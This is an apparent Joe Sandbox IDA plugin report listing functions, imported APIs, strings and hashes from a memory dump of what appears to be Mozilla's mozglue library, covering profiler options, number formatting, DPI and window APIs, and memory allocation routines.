free.MOZGLUE(?), ref: 6CCF5498

Strings

(, xrefs: 6CCF5250

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: floor$Sleep$freememsetmoz_xmalloc
String ID: (
API String ID: 4104871533-3887548279
Opcode ID: d1f1b5a5b4457c1936a7f65d0d4c3ed694648b10273473fcde889609cdd12636
Instruction ID: cf18dccd33c5e968bab6af3614ac5cc3d2ab3a8af34cf2c3bcaeaac599000965
Opcode Fuzzy Hash: d1f1b5a5b4457c1936a7f65d0d4c3ed694648b10273473fcde889609cdd12636
Instruction Fuzzy Hash: 35F1E371A18B008FD716CF38C85162BB7FAAFD6384F05872EF956A7651EB31D4428B81

Function 6CCB9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CCB9EB8
LeaveCriticalSection.KERNEL32(?), ref: 6CCB9F24
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CCB9F34
LeaveCriticalSection.KERNEL32(?), ref: 6CCBA823
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBA83C
?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CCBA849

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCBA8B1, 6CCBA8D4, 6CCBA8EF

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 2950001534-1351931279
Opcode ID: b2b31110281d8063696675fdbaa968a20aa0d4997060a68f0c2bf862d8840f0c
Instruction ID: ed27857beeb1d5e32e12341c79bc8936b1ad281374d2417f5890a86ba36d4e86
Opcode Fuzzy Hash: b2b31110281d8063696675fdbaa968a20aa0d4997060a68f0c2bf862d8840f0c
Instruction Fuzzy Hash: D9726E72A157118FD704CF69C540615FBE1BFC9328F29C66DE8A9AB791E335E842CB80

Function 6CCE2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CCE2C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CCE2C61

Part of subcall function 6CC94DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC94E5A
Part of subcall function 6CC94DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC94E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CCE2C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CCE2E2D

Part of subcall function 6CCA81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CCA81DE

Strings

(root), xrefs: 6CCE354F
expected a Time entry, xrefs: 6CCE2E36
ProfileBuffer parse error: %s, xrefs: 6CCE2E3B

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: f5480b8cc23c3ed91c2eb77f9294d1a741ae9358792137872f12b066405fff86
Instruction ID: ebe50acafae94020721a487e89ce84a27b0eaf3964498e54cd091cc8ab224353
Opcode Fuzzy Hash: f5480b8cc23c3ed91c2eb77f9294d1a741ae9358792137872f12b066405fff86
Instruction Fuzzy Hash: DF91E1B06087818FD724CF28C49469FB7E5AFCA358F14491DE59A8BB60EB30D949CB52

Function 6CC9D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

-, xrefs: 6CC9D7DD
, xrefs: 6CC9DA88
@, xrefs: 6CC9DAF6
0, xrefs: 6CC9D852
9, xrefs: 6CC9DE7F
0, xrefs: 6CC9DC7F
8, xrefs: 6CC9DC08
1, xrefs: 6CC9DBDD

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: fa42f2cae513e425051ef03d19816e0bdbc0073a6aa02f1ceabe4cc7dde53708
Instruction ID: d4f1044b7da81dd1bcf8a5a567f8e8e62f2d1bb17d40ff1b6072c3e64a44cdfe
Opcode Fuzzy Hash: fa42f2cae513e425051ef03d19816e0bdbc0073a6aa02f1ceabe4cc7dde53708
Instruction Fuzzy Hash: 0762AA7160C3858FD701CE29C09076ABBF2BF86358F184A4DE4E56BA91E335D985CB93

Function 6CC9BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CC9C1CB
__aulldiv.LIBCMT ref: 6CC9C24C
__aulldiv.LIBCMT ref: 6CC9C348
__aullrem.LIBCMT ref: 6CC9C365
__aulldiv.LIBCMT ref: 6CC9C37D

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: 1fd4e2e252732dc03e21e02a94ced911bfcaf4ae379119aeb7c6070f073f5e80
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: E9321532B146118FC718DE2CC890A56BBE6AFC9350F09866DE899CB3D5E734ED05CB91

Function 6CD0545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CD08A4B

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: c013ca5c1f43a3c902ec57ad493d62ea182ee3bca7deab30b111ccf608c4e9d2
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: C7B1C572F0121ACBDB14CF6CCC917A9B7B2EF85314F1802A9C989DB791E7309985CB91

Function 6CD0542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CD088F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CD0925C

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 9d2fec48b7b11b3254e4d09f64c6603dd4315626915702778eb85d376246f13e
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 47B1A472F0120ACBDB14CF6CCC816ADB7B2EF85314F150269C949DB795D730A989CB90

Function 6CCF85F0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6CCF8C7C
__aulldiv.LIBCMT ref: 6CCF8DD7

Strings

b1ee141:447804,3j0gg466:431877,resetbing:447060,c1i80862:426410,wponsat2_50:441048,jj2e6986:422781,995h3546:443806,9djb2419:437170,bfcg7827:432826,t9qranimationemailautofill:439591,70030996:441561,edgeshoppingcashbacksinabandonedcart:445065,ebd3g171:445684,tp-, xrefs: 6CCF88C1, 6CCF8B71

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: __aulldiv
String ID: b1ee141:447804,3j0gg466:431877,resetbing:447060,c1i80862:426410,wponsat2_50:441048,jj2e6986:422781,995h3546:443806,9djb2419:437170,bfcg7827:432826,t9qranimationemailautofill:439591,70030996:441561,edgeshoppingcashbacksinabandonedcart:445065,ebd3g171:445684,tp-
API String ID: 3732870572-3051238476
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 30dc85bc0db0c43c59eab8d21972c33e5516688cb2f7e91750839fdfa5cb07b6
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 91327031F001198BDF58CF9DC8A1BAEB7B2FF89300F15852AD516BB790DA349D458B91

Function 6CCD6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6CCD6D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CCD6E1E

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: a02c47d23ffa6b5847a73acbcc0be7882f5b87927cc7b24c5ca0e955d6961761
Instruction ID: 2e53f74b69a75cc68577d908f1eeb33155bd2850b329aaff873e31701da2446c
Opcode Fuzzy Hash: a02c47d23ffa6b5847a73acbcc0be7882f5b87927cc7b24c5ca0e955d6961761
Instruction Fuzzy Hash: F3A17D706187818FD715CF25C4907AAFBE2BF89308F05495DE58A87B51EB70B849CB92

Function 6CCB4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6CCB4777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCB5585, 6CCB55A8, 6CCB55C3, 6CCB5624

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 1a20ba7635ba27a67a5175d00d4fa72e3337d1b03eb9884a2a2faba433c8f818
Instruction ID: 46cd399106d30dab05405bc3acccefd88d9ea5d6c87ec98e48e9dc3139427c1c
Opcode Fuzzy Hash: 1a20ba7635ba27a67a5175d00d4fa72e3337d1b03eb9884a2a2faba433c8f818
Instruction Fuzzy Hash: 09B28D71A09A018FD708CF59C590715FBE2BFC5324B29C7ADE46A9B7A5E731E841CB80

Function 6CCD5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6CCA4A63,?,?), ref: 6CCD5F06

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 682aa47e86c94e6effe8ad0b50be820a688ddf3839e01484fc2d2acd14f9c167
Instruction ID: 83debd4dec36e34d5a84658397dbf387e63423c9636b80619831b6121aae6294
Opcode Fuzzy Hash: 682aa47e86c94e6effe8ad0b50be820a688ddf3839e01484fc2d2acd14f9c167
Instruction Fuzzy Hash: D8C1B1B5E012098BCB04CF99C1906EEBBB2FF89318F29415DD9556BB44E732B806CB90

Function 6CD076E3 Relevance: .5, Instructions: 540COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: 12c2beceb842e7d65d6da95a5153e73bb39ccfc8fd2bbe6aa2ce231d80dec422
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: F932F871E00619CFCB14CF98C890AADFBB2FF88308F558169C949AB755D731A986CF90

Function 6CCC0512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 7b5dd55b54450f99a52670dcee79b3bb467d0c277319c88c6ebcd31247655e7d
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: E12228B5E04619CFDB14CF99C890AADF7B2FF88304F548699D44AA7705D730A986CF81

Function 6CD0AC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2235ba016efe20c0ca3086ca920335e15f96a2ac0c1f21a27cda4b82d79bd1ea
Instruction ID: b2d0efaf6220dc09f1e262cd5e256b5c117e4956f8ce7b5e996486b0b01d6144
Opcode Fuzzy Hash: 2235ba016efe20c0ca3086ca920335e15f96a2ac0c1f21a27cda4b82d79bd1ea
Instruction Fuzzy Hash: A6F11471B087459FD700CF2CC8907AABBE2AFC5318F158A2DE5D8877A1E774D8858792

Function 6CCF55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6CCCE1A5), ref: 6CCF5606
LoadLibraryW.KERNEL32(gdi32,?,6CCCE1A5), ref: 6CCF560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CCF5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CCF563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CCF566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CCF567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CCF5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CCF56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CCF56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CCF56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CCF56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CCF5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CCF572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CCF5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CCF5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CCF577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CCF5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CCF57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CCF57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CCF57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CCF57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CCF57FF

Strings

LoadCursorW, xrefs: 6CCF5774
ReleaseDC, xrefs: 6CCF5742
CreateSolidBrush, xrefs: 6CCF57E4
GetThreadDpiAwarenessContext, xrefs: 6CCF562D
RegisterClassW, xrefs: 6CCF56AC
ShowWindow, xrefs: 6CCF56DE
MonitorFromWindow, xrefs: 6CCF578D
CreateWindowExW, xrefs: 6CCF56C5
AreDpiAwarenessContextsEqual, xrefs: 6CCF5637
GetMonitorInfoW, xrefs: 6CCF57A2
DeleteObject, xrefs: 6CCF57F9
SetWindowLongPtrW, xrefs: 6CCF57B7
LoadIconW, xrefs: 6CCF575B
GetDpiForWindow, xrefs: 6CCF5690
GetWindowDC, xrefs: 6CCF5710
user32, xrefs: 6CCF5601
SetWindowPos, xrefs: 6CCF56F7
StretchDIBits, xrefs: 6CCF57CC
EnableNonClientDpiScaling, xrefs: 6CCF5666
GetSystemMetricsForDpi, xrefs: 6CCF5677
gdi32, xrefs: 6CCF560A
FillRect, xrefs: 6CCF5729

Memory Dump Source

Source File: 00000000.00000002.1614109837.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1614092700.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614158643.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614181299.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1614200482.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 91d04dca62491326a8c64f45cb54ae276dec5d95cf26065f0d68fa107788bb8b
Instruction ID: 639f2ce2a34459b327e23b3fe0e7f6666f4dea4695893928817c54c8d4b7bdf3
Opcode Fuzzy Hash: 91d04dca62491326a8c64f45cb54ae276dec5d95cf26065f0d68fa107788bb8b
Instruction Fuzzy Hash: F75163B07157066FFB409F359D4592A3ABDAF06345B118429AB21E2F92FB74C8038F60

Function 6CCDCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6CCA582D), ref: 6CCDCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6CCA582D), ref: 6CCDCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6CD0FE98,?,?,?,?,?,6CCA582D), ref: 6CCDCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6CCA582D), ref: 6CCDCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6CCDCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6CCDCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6CCDCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6CCDCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6CCDCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6CCDCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6CCDCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6CCDCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6CCDCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6CCDCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6CCDCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6CCDCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6CCDCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6CCDCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6CCDCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6CCDCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6CCDCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6CCDCE8A

Strings

fileio, xrefs: 6CCDCC92
power, xrefs: 6CCDCE84
markersallthreads, xrefs: 6CCDCE42
unregisteredthreads, xrefs: 6CCDCE58
screenshots, xrefs: 6CCDCCD4
fileioall, xrefs: 6CCDCCA8
processcpu, xrefs: 6CCDCE6E
ipcmessages, xrefs: 6CCDCDBE
nostacksampling, xrefs: 6CCDCD7C
preferencereads, xrefs: 6CCDCD92
cpuallthreads, xrefs: 6CCDCE16
audiocallbacktracing, xrefs: 6CCDCDD4
nativeallocations, xrefs: 6CCDCDA8
default, xrefs: 6CCDCC21
jsallocations, xrefs: 6CCDCD0E
java, xrefs: 6CCDCC37
leaf, xrefs: 6CCDCC66
